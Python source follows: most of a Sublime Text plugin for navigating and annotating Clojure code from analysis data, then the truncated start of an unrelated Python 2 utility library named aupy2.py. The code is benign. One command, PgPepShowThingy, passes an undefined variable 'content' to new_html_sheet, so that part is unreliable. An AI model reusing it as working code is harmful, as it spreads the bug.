elif thingy_type == TT_NAMESPACE_USAGE_ALIAS:
regions.append(namespace_usage_alias_region(view, thingy_data))
var_usages = find_namespace_vars_usages(analysis, thingy_data)
for var_usage in var_usages:
if region := var_usage_namespace_region(view, var_usage):
regions.append(region)
return regions
# ---
class PgPepClearCacheCommand(sublime_plugin.WindowCommand):
def run(self):
global _view_analysis_
_view_analysis_ = {}
global _paths_analysis_
_paths_analysis_ = {}
global _classpath_analysis_
_classpath_analysis_ = {}
class PgPepEraseAnalysisRegionsCommand(sublime_plugin.TextCommand):
def run(self, edit):
erase_analysis_regions(self.view)
class PgPepAnalyzeClasspathCommand(sublime_plugin.WindowCommand):
def run(self):
analyze_classpath_async(self.window)
class PgPepAnalyzePathsCommand(sublime_plugin.WindowCommand):
def run(self):
analyze_paths_async(self.window)
class PgPepAnalyzeViewCommand(sublime_plugin.TextCommand):
def run(self, edit):
analyze_view_async(self.view)
class PgPepGotoAnythingCommand(sublime_plugin.WindowCommand):
"""
Goto anything in scope.
Scope is one of: 'view', 'paths' or 'classpath'.
"""
def run(self, scope="view"):
project_path_ = project_path(self.window)
active_view = self.window.active_view()
# Goto is a window command, so it's possible
# that there isn't an active view.
# In that case, an empty analysis dict is used.
view_analysis_ = view_analysis(active_view.id()) if active_view else {}
paths_analysis_ = paths_analysis(project_path_)
classpath_analysis_ = classpath_analysis(project_path_)
analysis_ = {}
if scope == "view":
analysis_ = view_analysis_
elif scope == "paths":
analysis_ = paths_analysis_
elif scope == "classpath":
analysis_ = classpath_analysis_
items_ = [
*namespace_goto_items(analysis_),
*var_goto_items(analysis_),
*keyword_goto_items(analysis_),
]
show_goto_thingy_quick_panel(self.window, items_)
class PgPepGotoNamespaceCommand(sublime_plugin.WindowCommand):
"""
Goto namespace in scope.
Scope is either 'classpath' or 'paths'.
"""
def run(self, scope="paths"):
project_path_ = project_path(self.window)
analysis_ = (
paths_analysis(project_path_)
if scope == "paths"
else classpath_analysis(project_path_)
)
items_ = namespace_goto_items(analysis_)
# Sort by namespace name.
items_ = sorted(items_, key=lambda d: d["thingy_data"]["name"])
show_goto_thingy_quick_panel(self.window, items_)
class PgPepGotoVarCommand(sublime_plugin.WindowCommand):
"""
Goto var in scope.
Scope is either 'classpath' or 'paths'.
"""
def run(self, scope="paths"):
project_path_ = project_path(self.window)
analysis_ = (
paths_analysis(project_path_)
if scope == "paths"
else classpath_analysis(project_path_)
)
items_ = var_goto_items(analysis_)
show_goto_thingy_quick_panel(self.window, items_)
class PgPepGotoKeywordCommand(sublime_plugin.WindowCommand):
"""
Goto keyword in scope.
Scope is either 'classpath' or 'paths'.
"""
def run(self, scope="paths"):
project_path_ = project_path(self.window)
analysis_ = (
paths_analysis(project_path_)
if scope == "paths"
else classpath_analysis(project_path_)
)
items_ = keyword_goto_items(analysis_)
show_goto_thingy_quick_panel(self.window, items_)
class PgPepGotoSpecCommand(sublime_plugin.WindowCommand):
"""
Goto keyword defined by Clojure Spec in scope.
Scope is either 'classpath' or 'paths'.
"""
def run(self, scope="paths"):
project_path_ = project_path(self.window)
analysis_ = (
paths_analysis(project_path_)
if scope == "paths"
else classpath_analysis(project_path_)
)
items_ = keyword_goto_items(analysis_)
items_ = [
item_
for item_ in items_
if item_["thingy_data"]["reg"] == "clojure.spec.alpha/def"
]
show_goto_thingy_quick_panel(self.window, items_)
class PgPepCopyNameCommand(sublime_plugin.TextCommand):
"""
Copy a Thingy's name to the clipboard.
"""
def run(self, edit):
view_analysis_ = view_analysis(self.view.id())
region = thingy_sel_region(self.view)
thingy = thingy_in_region(self.view, view_analysis_, region)
if thingy:
thingy_type, _, thingy_data = thingy
thingy_namespace = thingy_data.get("ns") or thingy_data.get("to")
thingy_name = thingy_data.get("name")
thingy_qualified_name = (
f"{thingy_namespace}/{thingy_name}" if thingy_namespace else thingy_name
)
sublime.set_clipboard(thingy_qualified_name)
self.view.window().status_message("Copied")
class PgPepThingyNamespaceCommand(sublime_plugin.TextCommand):
"""
Show a Thingy's namespace in a popup.
"""
def run(self, edit):
view_analysis_ = view_analysis(self.view.id())
region = thingy_sel_region(self.view)
thingy = thingy_in_region(self.view, view_analysis_, region)
if thingy:
thingy_type, _, thingy_data = thingy
if thingy_namespace := thingy_data.get("ns") or thingy_data.get("to"):
content = f"""
<body id='pg-pep-thingy-namespace'>
{htmlify(thingy_namespace)}
</body>
"""
self.view.show_popup(
content,
location=-1,
max_width=500,
)
class PgPepShowDocCommand(sublime_plugin.TextCommand):
def run(self, edit, side_by_side=False):
is_debug = debug()
view_analysis_ = view_analysis(self.view.id())
region = self.view.sel()[0]
thingy = thingy_in_region(self.view, view_analysis_, region)
if thingy is None:
return
thingy_type, _, thingy_data = thingy
definition = None
project_path_ = project_path(self.view.window())
paths_analysis_ = paths_analysis(project_path_)
classpath_analysis_ = classpath_analysis(project_path_)
if thingy_type == TT_VAR_DEFINITION or thingy_type == TT_VAR_USAGE:
# Try to find Var definition in view first,
# only if not found try paths and project analysis.
definition = (
find_var_definition(view_analysis_, thingy_data)
or find_var_definition(paths_analysis_, thingy_data)
or find_var_definition(classpath_analysis_, thingy_data)
)
elif (
thingy_type == TT_NAMESPACE_DEFINITION
or thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
definition = (
find_namespace_definition(view_analysis_, thingy_data)
or find_namespace_definition(paths_analysis_, thingy_data)
or find_namespace_definition(classpath_analysis_, thingy_data)
)
if definition:
# Name
# ---
name = definition.get("name", "")
name = inspect.cleandoc(html.escape(name))
ns = definition.get("ns", "")
ns = inspect.cleandoc(html.escape(ns))
filename = definition.get("filename")
qualified_name = f"{ns}/{name}" if ns else name
goto_command_url = sublime.command_url(
"pg_pep_goto",
{"location": thingy_location(definition)},
)
name_minihtml = f"""
<p class="name">
<a href="{goto_command_url}">{qualified_name}</a>
</p>
"""
# Arglists
# ---
arglists = definition.get("arglist-strs")
arglists_minihtml = ""
if arglists:
arglists_minihtml = """<p class="arglists">"""
for arglist in arglists:
arglists_minihtml += f"<code>{htmlify(arglist)}</code>"
arglists_minihtml += """</p>"""
# Doc
# ---
doc = definition.get("doc")
doc_minihtml = ""
if doc:
doc = re.sub(r"\s", " ", htmlify(doc))
doc_minihtml = f"""<p class="doc">{doc}</p>"""
content = f"""
<body id='pg-pep-show-doc'>
{name_minihtml}
{arglists_minihtml}
{doc_minihtml}
</body>
"""
if side_by_side:
sheet = self.view.window().new_html_sheet(
qualified_name,
content,
sublime.SEMI_TRANSIENT,
)
self.view.window().focus_sheet(sheet)
else:
self.view.show_popup(
content,
location=-1,
max_width=500,
)
class PgPepJumpCommand(sublime_plugin.TextCommand):
"""
Command to jump to thingies.
"""
def initialize_navigation(self, analysis, thingy_id, thingy_findings):
navigation = view_navigation(analysis)
if thingy_id != navigation.get("thingy_id"):
set_view_navigation(
analysis,
{
"thingy_id": thingy_id,
"thingy_findings": thingy_findings,
},
)
def find_position(self, thingy_data, thingy_findings):
for position, finding in enumerate(thingy_findings):
if finding == thingy_data:
return position
return -1
def jump(self, state, movement, findings_position):
navigation = view_navigation(state)
findings_position_after = findings_position
if movement == "forward":
if findings_position < len(navigation["thingy_findings"]) - 1:
findings_position_after = findings_position + 1
elif movement == "back":
if findings_position > 0:
findings_position_after = findings_position - 1
if findings_position != findings_position_after:
finding_at_position = navigation["thingy_findings"][findings_position_after]
region = local_binding_region(self.view, finding_at_position)
region = sublime.Region(region.begin(), region.begin())
self.view.sel().clear()
self.view.sel().add(region)
self.view.show(region)
def run(self, edit, movement):
state = view_analysis(self.view.id())
region = self.view.sel()[0]
if thingy := thingy_in_region(self.view, state, region):
thingy_type, thingy_region, thingy_data = thingy
# Navigation is a dictionary with keys:
# - thingy_id
# - thingy_findings
navigation = view_navigation(state)
thingy_findings = []
thingy_id = None
if thingy_type == TT_KEYWORD:
# It's a keyword in a keys destructuring context, so it creates a local binding.
# Instead of navigating to another keyword, we navigate to the next usage of the local.
if thingy_data.get("keys-destructuring", False):
lrn = analysis_lrn(state)
region = keyword_region(self.view, thingy_data)
# We should find a local binding for the keyword because of destructuring.
thingy_region, thingy_data = local_binding_in_region(
self.view, lrn, region
) or (None, None)
thingy = (TT_LOCAL_BINDING, thingy_region, thingy_data)
# Find local usages for this local binding (thingy).
local_usages = find_local_usages(state, thingy_data)
thingy_findings = [thingy_data]
thingy_findings.extend(local_usages)
thingy_id = thingy_data.get("id")
else:
thingy_findings = find_keywords(state, thingy_data)
thingy_id = (thingy_data.get("ns"), thingy_data.get("name"))
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif thingy_type == TT_LOCAL_BINDING:
# Find local usages for this local binding (thingy).
local_usages = find_local_usages(state, thingy_data)
thingy_findings = [thingy_data]
thingy_findings.extend(local_usages)
thingy_id = thingy_data.get("id")
if thingy_id:
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif thingy_type == TT_LOCAL_USAGE:
# Find local binding for this local usage (thingy).
local_binding = find_local_binding(state, thingy_data)
# It's possible to have a local usage without a local binding.
# (It looks like a clj-kondo bug.)
if local_binding is None:
return
local_usages = find_local_usages(state, local_binding)
thingy_findings = [local_binding]
thingy_findings.extend(local_usages)
thingy_id = thingy_data.get("id")
if thingy_id:
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif thingy_type == TT_VAR_DEFINITION:
# Find Var usages for this Var definition (thingy).
var_usages = find_var_usages(state, thingy_data)
thingy_findings = [thingy_data]
thingy_findings.extend(var_usages)
thingy_id = (thingy_data.get("ns"), thingy_data.get("name"))
if thingy_id:
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif thingy_type == TT_VAR_USAGE:
# Find Var definition for this Var usage (thingy).
var_definition = find_var_definition(state, thingy_data)
var_usages = find_var_usages(state, thingy_data)
thingy_findings = [var_definition] if var_definition else []
thingy_findings.extend(var_usages)
thingy_id = (thingy_data.get("to"), thingy_data.get("name"))
if thingy_id:
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif (
thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
# Jumping from a namespace usage, or alias, moves the caret
# to the first var usage of the namespace.
if thingy_findings := find_namespace_vars_usages(state, thingy_data):
# ID is the namespace name.
thingy_id = thingy_data.get("to")
self.initialize_navigation(state, thingy_id, thingy_findings)
# Jump to first var usage.
self.jump(state, movement, -1)
class PgPepShowThingy(sublime_plugin.TextCommand):
def run(self, edit):
region = self.view.sel()[0]
analysis = view_analysis(self.view.id())
thingy = thingy_in_region(self.view, analysis, region)
if thingy is None:
return
thingy_type, _, thingy_data = thingy
items_html = ""
for k, v in thingy_data.items():
items_html += f"<li>{htmlify(str(k))}: {htmlify(str(v))}</li>"
html = f"""
<body id='pg-pep-show-thingy'>
<style>
h1 {{
font-size: 1.1rem;
font-weight: 500;
font-family: system;
}}
</style>
<h1>{thingy_type}</h1>
<ul>
{items_html}
</ul>
</body>
"""
flags = (
sublime.SEMI_TRANSIENT | sublime.ADD_TO_SELECTION | sublime.CLEAR_TO_RIGHT
)
        sheet = self.view.window().new_html_sheet(thingy_type, content, flags)
self.view.window().focus_sheet(sheet)
class PgPepGotoCommand(sublime_plugin.WindowCommand):
def run(self, location=None, side_by_side=False):
if location:
flags = GOTO_SIDE_BY_SIDE_FLAGS if side_by_side else GOTO_DEFAULT_FLAGS
goto(self.window, location, flags)
else:
print("(Pep) Can't goto without a location")
class PgPepGotoDefinitionCommand(sublime_plugin.TextCommand):
"""
Command to goto definition of a var, namespace, and keyword.
In case of a keyword, it works for re-frame handlers and Clojure Spec.
"""
def run(self, edit, side_by_side=False):
window = self.view.window()
view = self.view
analysis = view_analysis(view.id())
region = thingy_sel_region(view)
if thingy := thingy_in_region(view, analysis, region):
thingy_type, _, thingy_data = thingy
definition = None
if thingy_type == TT_LOCAL_USAGE:
definition = find_local_binding(analysis, thingy_data)
elif (
thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
project_path_ = project_path(window)
paths_analysis_ = paths_analysis(project_path_)
classpath_analysis_ = classpath_analysis(project_path_)
definition = (
find_namespace_definition(analysis, thingy_data)
or find_namespace_definition(paths_analysis_, thingy_data)
or find_namespace_definition(classpath_analysis_, thingy_data)
)
elif thingy_type == TT_VAR_USAGE:
namespace_ = thingy_data.get("to", None)
name_ = thingy_data.get("name", None)
project_path_ = project_path(window)
paths_analysis_ = paths_analysis(project_path_)
classpath_analysis_ = classpath_analysis(project_path_)
definition = (
find_var_definition(analysis, thingy_data)
or find_var_definition(paths_analysis_, thingy_data)
or find_var_definition(classpath_analysis_, thingy_data)
)
elif thingy_type == TT_KEYWORD:
keyword_namespace = thingy_data.get("ns", None)
keyword_name = thingy_data.get("name", None)
project_path_ = project_path(window)
paths_analysis_ = paths_analysis(project_path_)
definition = find_keyword_definition(
analysis, thingy_data
) or find_keyword_definition(paths_analysis_, thingy_data)
if definition:
flags = GOTO_SIDE_BY_SIDE_FLAGS if side_by_side else GOTO_DEFAULT_FLAGS
goto(window, thingy_location(definition), flags)
else:
print("(Pep) Unable to find definition")
class PgPepTraceUsages(sublime_plugin.TextCommand):
"""
Command to trace usages of a var or namespace.
"""
def run(self, edit):
view_analysis_ = view_analysis(self.view.id())
region = thingy_sel_region(self.view)
if thingy := thingy_in_region(self.view, view_analysis_, region):
thingy_type, thingy_region, thingy_data = thingy
project_path_ = project_path(self.view.window())
paths_analysis_ = paths_analysis(project_path_)
thingy_usages = None
# Find usages, in paths analysis, from var definition or usage:
if thingy_type == TT_VAR_DEFINITION or thingy_type == TT_VAR_USAGE:
thingy_usages = find_var_usages(paths_analysis_, thingy_data)
def trace_var_usages(thingy_usage):
from_ = thingy_usage.get("from")
from_var_ = thingy_usage.get("from-var")
from_usages = var_usages(paths_analysis_, (from_, from_var_))
return {
"thingy_data": thingy_usage,
"thingy_traces": [
trace_var_usages(from_usage)
for from_usage in from_usages
if not recursive_usage(from_usage)
],
}
def tree_branches(trace, level=1):
thingy_data = trace.get("thingy_data", {})
from_namespace = thingy_data.get("from")
from_var = thingy_data.get("from-var")
from_var = "/" + from_var if from_var else ""
filename = thingy_data.get("filename", "")
row = thingy_data.get("row", "")
col = thingy_data.get("col", "")
s = ""
            # It doesn't seem useful to show a referred var usage, so it's ignored.
# There might be other cases that should be ignored too.
is_ignored = thingy_data.get("refer", False)
if not is_ignored:
s = "\n " + ("\t" * level) + "-"
s = (
s
+ f" {from_namespace}{from_var} (File: {filename}:{row}:{col})"
)
for trace in trace["thingy_traces"]:
s = s + tree_branches(trace, level=level + 1)
return s
def tree(trace):
thingy_data = trace.get("thingy_data", {})
name = thingy_data.get("name")
namespace = thingy_data.get("ns") or thingy_data.get("from")
thingy_traces = trace["thingy_traces"]
s = f"- {namespace}/{name} (Usages: {len(thingy_traces)})"
for trace in thingy_traces:
s = s + tree_branches(trace)
return s
if thingy_usages:
trace = {
"thingy_data": thingy_data,
"thingy_traces": [
trace_var_usages(thingy_usage)
for thingy_usage in thingy_usages
if not recursive_usage(thingy_usage)
],
}
window = self.view.window()
output_view_ = output_panel(window)
output_view_.set_read_only(False)
output_view_.settings().set("line_numbers", False)
output_view_.settings().set("gutter", False)
output_view_.settings().set("is_widget", True)
output_view_.settings().set("word_wrap", False)
output_view_.settings().set("line_padding_top", 0)
output_view_.settings().set("line_padding_bottom", 0)
output_view_.settings().set(
"result_file_regex", r"\(File: ([^\"]+):(\d+):(\d+)\)"
)
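                # With result_file_regex set, the "(File: path:row:col)" suffixes emitted by
                # tree_branches should become navigable through Sublime's result navigation
                # (e.g. the next_result command / double-click), jumping to file:row:col.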
output_view_.run_command("select_all")
output_view_.run_command("right_delete")
output_view_.run_command(
"append",
{
"characters": tree(trace),
},
)
output_view_.set_read_only(True)
show_output_panel(window)
class PgPepFindUsagesCommand(sublime_plugin.TextCommand):
def run(self, edit, scope="view"):
view_analysis_ = view_analysis(self.view.id())
viewport_position = self.view.viewport_position()
region = self.view.sel()[0]
if thingy := thingy_in_region(self.view, view_analysis_, region):
thingy_type, thingy_region, thingy_data = thingy
project_path_ = project_path(self.view.window())
paths_analysis_ = paths_analysis(project_path_)
thingy_usages = None
# The analysis used is based on the scope parameter:
analysis_ = view_analysis_ if scope == "view" else paths_analysis_
if thingy_type == TT_KEYWORD:
# To be considered:
# If the keyword is a destructuring key,
# should it show its local usages?
thingy_usages = find_keyword_usages(analysis_, thingy_data)
elif thingy_type == TT_VAR_DEFINITION:
thingy_usages = find_var_usages(analysis_, thingy_data)
elif thingy_type == TT_VAR_USAGE:
thingy_usages = find_var_usages(analysis_, thingy_data)
elif thingy_type == TT_NAMESPACE_DEFINITION:
thingy_usages = find_namespace_usages(analysis_, thingy_data)
elif (
thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
# Usages of a namespace, in the scope of a single view, shows usages of vars instead of namespace.
# I think it's safe to assume that this behavior is expected for view usages.
if scope == "view":
thingy_usages = find_namespace_vars_usages(
analysis_,
thingy_data,
)
else:
thingy_usages = find_namespace_usages_with_usage(
analysis_,
thingy_data,
)
if thingy_usages:
if len(thingy_usages) == 1:
location = thingy_location(thingy_usages[0])
goto(self.view.window(), location)
else:
quick_panel_items = []
for thingy_usage in thingy_usages:
trigger = thingy_usage.get("from") or os.path.basename(
thingy_usage.get("filename")
)
details = thingy_usage.get("filename", "")
annotation = f'Line {thingy_usage.get("row", "Row")}, Column {thingy_usage.get("col", "Col")}'
quick_panel_items.append(
sublime.QuickPanelItem(
trigger,
details,
annotation,
thingy_kind(thingy_type, thingy_data),
)
)
def on_done(index, _):
if index == -1:
# Restore selection and viewport position:
self.view.sel().clear()
self.view.sel().add(region)
self.view.window().focus_view(self.view)
self.view.set_viewport_position(viewport_position, True)
else:
location = thingy_location(thingy_usages[index])
goto(self.view.window(), location)
def on_highlighted(index):
location = thingy_location(thingy_usages[index])
goto(
self.view.window(),
location,
flags=sublime.ENCODED_POSITION | sublime.TRANSIENT,
)
placeholder = None
if (
thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
placeholder = f"{thingy_data.get('to')} is used {len(thingy_usages)} times"
else:
placeholder = f"{thingy_data.get('name')} is used {len(thingy_usages)} times"
self.view.window().show_quick_panel(
quick_panel_items,
on_done,
sublime.WANT_EVENT,
0,
on_highlighted,
placeholder,
)
class PgPepSelectCommand(sublime_plugin.TextCommand):
def run(self, edit):
is_debug = debug()
view_analysis_ = view_analysis(self.view.id())
region = self.view.sel()[0]
thingy = thingy_in_region(self.view, view_analysis_, region)
if is_debug:
print("(Pep) Thingy", thingy)
if thingy:
regions = find_thingy_regions(self.view, view_analysis_, thingy)
self.view.sel().clear()
self.view.sel().add_all(regions)
class PgPepHighlightCommand(sublime_plugin.TextCommand):
def run(self, edit):
analysis = view_analysis(self.view.id())
region = self.view.sel()[0]
thingy = thingy_in_region(self.view, analysis, region)
self.view.erase_regions("pg_pep_highligths")
# We can't highlight if view was modified,
# because regions might be different.
if thingy and not staled_analysis(self.view):
regions = find_thingy_regions(self.view, analysis, thingy)
if regions:
highlight_regions(self.view, self.view.sel(), regions)
class PgPepAnnotateCommand(sublime_plugin.TextCommand):
def run(self, edit):
try:
def finding_region(finding):
line_start = finding["row"] - 1
line_end = (finding.get("end-row") or finding.get("row")) - 1
col_start = finding["col"] - 1
col_end = (finding.get("end-col") or finding.get("col")) - 1
pa = self.view.text_point(line_start, col_start)
pb = self.view.text_point(line_end, col_end)
return sublime.Region(pa, pb)
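            # The -1 adjustments above convert the 1-based row/col values reported by the
            # analysis findings into Sublime's 0-based text points (an assumption based on
            # how finding_region is used here).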
def finding_minihtml(finding):
return f"""
<body>
                <div>
                    <span>{htmlify(finding["message"])}</span>
                </div>
</body>
"""
analysis = view_analysis(self.view.id())
findings = analysis_findings(analysis)
warning_region_set = []
warning_minihtml_set = []
error_region_set = []
error_minihtml_set = []
for finding in findings:
if finding["level"] == "error":
error_region_set.append(finding_region(finding))
error_minihtml_set.append(finding_minihtml(finding))
elif finding["level"] == "warning":
warning_region_set.append(finding_region(finding))
warning_minihtml_set.append(finding_minihtml(finding))
# Erase regions from previous analysis.
erase_analysis_regions(self.view)
redish = self.view.style_for_scope("region.redish")["foreground"]
orangish = self.view.style_for_scope("region.orangish")["foreground"]
self.view.add_regions(
"pg_pep_analysis_error",
error_region_set,
scope="region.redish",
annotations=error_minihtml_set,
annotation_color=redish,
flags=(
sublime.DRAW_SQUIGGLY_UNDERLINE
| sublime.DRAW_NO_FILL
| sublime.DRAW_NO_OUTLINE
),
)
self.view.add_regions(
"pg_pep_analysis_warning",
warning_region_set,
scope="region.orangish",
annotations=warning_minihtml_set,
annotation_color=orangish,
flags=(
sublime.DRAW_SQUIGGLY_UNDERLINE
| sublime.DRAW_NO_FILL
| sublime.DRAW_NO_OUTLINE
),
)
status_messages = []
if settings().get("view_status_show_errors", True):
if summary_errors := analysis_summary(analysis).get("error"):
status_messages.append(f"Errors: {summary_errors}")
if settings().get("view_status_show_warnings", False):
if summary_warnings := analysis_summary(analysis).get("warning"):
status_messages.append(f"Warnings: {summary_warnings}")
# Show the number of errors and/or warnings:
# (Clear the status if there isn't any error or warning.)
self.view.set_status(
"pg_pep_view_summary",
", ".join(status_messages) if status_messages else "",
)
        except Exception:
            print("(Pep) Annotate failed.", traceback.format_exc())
class PgPepViewListener(sublime_plugin.ViewEventListener):
"""
These 'actions' are configured via settings.
    You might want to disable running analyses on load & save, for instance.
See Pep.sublime-settings.
"""
@classmethod
def is_applicable(_, settings):
return settings.get("syntax") in {
"Packages/Tutkain/Clojure (Tutkain).sublime-syntax",
"Packages/Tutkain/ClojureScript (Tutkain).sublime-syntax",
"Packages/Tutkain/Clojure Common (Tutkain).sublime-syntax",
"Packages/Clojure/Clojure.sublime-syntax",
"Packages/Clojure/ClojureScript.sublime-syntax",
}
def __init__(self, view):
self.view = view
self.modified_time = None
def view_analysis_completed(self, analysis):
if annotate_view_analysis():
self.view.run_command("pg_pep_annotate")
def on_activated_async(self):
analyze_view_async(self.view, on_completed=self.view_analysis_completed)
def on_modified_async(self):
"""
The time of modification is recorded so it's possible
to check how long ago the last change happened.
        It's very important for the view analysis. See `on_selection_modified_async`.
"""
self.modified_time = time.time()
def on_post_save_async(self):
if settings().get("analyze_paths_on_post_save", False):
analyze_paths_async(self.view.window())
def on_selection_modified_async(self):
"""
When the selection is modified, two actions might be triggered:
- A region is highlighted;
- Active view is analyzed.
The view is analyzed (async) when its analysis data is staled
and it passes a threshold (in seconds) of the last time the view was modified.
"""
if automatically_highlight():
sublime.set_timeout(lambda: self.view.run_command("pg_pep_highlight"), 0)
if self.modified_time:
# Don't analyze when the programmer is editing the view.
            # (When the last modification timestamp is less than the threshold.)
if staled_analysis(self.view) and (time.time() - self.modified_time) > 0.2:
analyze_view_async(self.view, on_completed=self.view_analysis_completed)
def on_close(self):
"""
It's important to delete a view's state on close.
"""
set_view_analysis(self.view.id(), {})
class PgPepEventListener(sublime_plugin.EventListener):
"""
Paths and classpath are analyzed when a project is loaded.
    Analyses are cleared when a project is closed.
"""
def on_load_project_async(self, window):
if settings().get("analyze_paths_on_load_project", False):
analyze_paths_async(window)
if settings().get("analyze_classpath_on_load_project", False):
analyze_classpath_async(window)
def on_pre_close_project(self, window):
"""
Called right before a project is closed.
"""
project_path_ = project_path(window)
print(f"(Pep) Clear project cache (Project: {project_path_})")
if project_path_:
set_paths_analysis(project_path_, {})
set_classpath_analysis(project_path_, {})
# ---
def plugin_loaded():
print("(Pep) Plugin loaded")
if window := sublime.active_window():
if settings().get("analyze_paths_on_plugin_loaded", False):
analyze_paths_async(window)
if settings().get("analyze_classpath_on_plugin_loaded", False):
analyze_classpath_async(window)
|
aupy2.py
|
#!/usr/bin/env python
"""Aupy 2.0
Author: Paul deGrandis
Created: June 02 2008
Requires Python 2.5
Copyright (c) 2008 Paul deGrandis // aupy.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from __future__ import with_statement
import sys
if sys.version < '2.5':
print "Aupy 2.0 requires Python 2.5 or higher"
sys.exit(1)
from threading import Thread
from contextlib import contextmanager
from functools import wraps
class RegisterUtilityMethods(type):
"""A metaclass to auto register utility methods"""
def __new__(mcls, classname, bases, classdict):
"""Auto register all utility methods
Do this in a similar manner as the earlier version of Aupy did"""
utilMeths = classdict.setdefault("_utilityMethods", [])
for item in classdict.values():
if callable(item) and hasattr(item, "_utilitySpecs"):
utilMeths.append(item)
return super(RegisterUtilityMethods, mcls).__new__(mcls, classname, bases, classdict)
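# Hedged usage sketch for the metaclass above: a class that sets
#   __metaclass__ = RegisterUtilityMethods        (Python 2 syntax, as in this module)
# gets every method carrying a _utilitySpecs attribute collected into the class's
# _utilityMethods list at class-creation time.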
class Utility(object):
"""A class containing all necessary functionality for
utility creation and interaction."""
class UtilityError(Exception):
"""A class for general utility method errors"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class UtilityMethodsMixIn(object):
"""This mixin provides the extra functionality for classes
that contain Utility Methods.
Currently this is only auto Utility Method Registration."""
__metaclass__ = RegisterUtilityMethods
def __init__(self):
super(UtilityMethodsMixIn, self).__init__()
@staticmethod
def isValidUtilityMethod(func):
"""Allows reflection to work on utility methods;
Answers: 'Could this be a utility method?'"""
return hasattr(func, "_utilitySpecs")
@staticmethod
def isUtilityMethod(func, self_or_dict=[]):
"""Checks the current registered functions to see if
a given function is a known utility method.
Please also see isValidUtilityMethod.
Arguments:
func - the function in question
[self_or_dict] - an object's identity reference or dictionary (for scoping)
Returns:
result - a boolean"""
return func in Utility.getAllRegisteredUtilityFunctions(self_or_dict)
@staticmethod
def checkUtilityResult(utilityFunc, *args, **kwargs):
"""Evaluate a utility function's result against a specific evaluation function.
The evaluation function can be used to specify thresholds, but by default
uses the bool function. All callback info is removed before evaluation.
Arguments:
utilityFunc - the function to call to generate the result; the utility function
[evalFunc] - the evaluation function for utilityFunc's result
THIS MUST BE PASSED AS A KEYWORD ARG!
IT WILL GET POPPED BEFORE f IS EVALUATED; IT WILL NOT BE IN f's KWARGS!
Returns:
func_result - the function's, utilityFunc's, result
Raises:
Utility.UtilityError if utilityFunc's result fails the evaluation"""
evalFunc = kwargs.pop("evalFunc", bool)
#remove all callback related args:
cb = kwargs.pop("utilityCallback", None)
cb_args = kwargs.pop("utilityCallbackArgs", None)
func_result = utilityFunc(*args, **kwargs)
utility_result = evalFunc(func_result)
if not utility_result:
raise Utility.UtilityError
return func_result
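    # Illustrative (hedged) sketch of checkUtilityResult:
    #   Utility.checkUtilityResult(len, [1, 2, 3], evalFunc=lambda n: n > 0)
    # returns 3, while an empty list would fail the evalFunc/bool check and
    # raise Utility.UtilityError instead.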
@staticmethod
def handleCallback(*args, **kwargs):
"""Handle callbacks for Utility Exceptions.
This is mostly used internally for contexts, but can be used by developers.
Arguments (All must be passed via keyword arguments):
[utilityCallback] - the callback function; If not specified, no callback will take place
[utilityCallbackArgs] - arguments to pass to the callback function, if not specified,
the args pass to this handler will be used
Returns:
utilityCallback(utilityCallbackArgs)
Raises:
raise - if no callback is specified, a call to raise takes place.
This is because this is mostly used within contexts, where
this behavior makes sense (an exception within the user-defined block)"""
utilityCallback = kwargs.get("utilityCallback", None)
if utilityCallback:
utilityCallbackArgs = kwargs.get("utilityCallbackArgs", args)
return utilityCallback(*utilityCallbackArgs)
else:
raise
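    # Hedged note: when the context managers below catch Utility.UtilityError, this
    # handler re-raises it unless a 'utilityCallback' kwarg was supplied, e.g.
    #   Utility.contextUtility(check, data, utilityCallback=log_failure)
    # where check, data and log_failure are hypothetical caller-provided objects.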
@staticmethod
def _dictOrGlobals(f, args):
"""This is used to establish scoping attributes
and is only intended to be used by utility and monitor decorators.
Arguments:
f - the function who needs to get access to _dictOrGlobals
in a decorator, this is the function passed in.
args - the list/tuple of args passed to a function/method
Returns:
self_dict - a dictionary that is either globals() or class/obj dict"""
#return len(args)>0 and hasattr(args[0], f.__name__) and args[0].__dict__ or globals()
if len(args) > 0 and hasattr(args[0], f.__name__):
return args[0].__dict__
return globals()
@staticmethod
def getAllRegisteredUtilityFunctions(self_or_dict=None):
"""Returns all utility functions within all given scopes.
Scope is determined by a function object passed in.
Arguments:
self_or_dict - the object's identity reference or the object's dictionary
Returns:
all_utils - list of all available utility functions"""
class_utils = []
if type(self_or_dict) is dict:
